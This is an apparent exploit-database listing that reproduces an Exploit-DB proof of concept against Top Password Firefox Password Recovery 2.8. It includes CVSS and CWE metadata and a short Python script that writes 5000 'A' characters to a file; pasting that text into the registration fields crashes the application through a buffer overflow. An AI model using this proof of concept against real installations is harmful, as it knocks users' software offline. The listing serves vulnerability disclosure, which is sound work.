header-logo
Suggest Exploit
vendor:
Firefox Password Recovery
by:
Antonio de la Piedra
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Firefox Password Recovery
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: NO
Related CWE: N/A
CPE: a:top_password:firefox_password_recovery:2.8
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 32-bit
2020

Top Password Firefox Password Recovery 2.8 – Denial of Service (PoC)

When the contents of poc.txt are copied and pasted into the User Name / Registration Code input fields, the application crashes due to a buffer overflow.

Mitigation:

Input validation should be used to prevent buffer overflows.
Source

Exploit-DB raw data:

# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
# Date: 2020-01-12
# Exploit Author: Antonio de la Piedra
# Vendor Homepage: https://www.top-password.com/
# Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe
# Version: 2.8
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt  into the
# User Name / Registration Code input fields.

#!/usr/bin/python

poc =3D "A"*5000
file =3D open("poc.txt","w")
file.write(poc)
file.close()

Navigation

Suggest Exploit

Services By CQR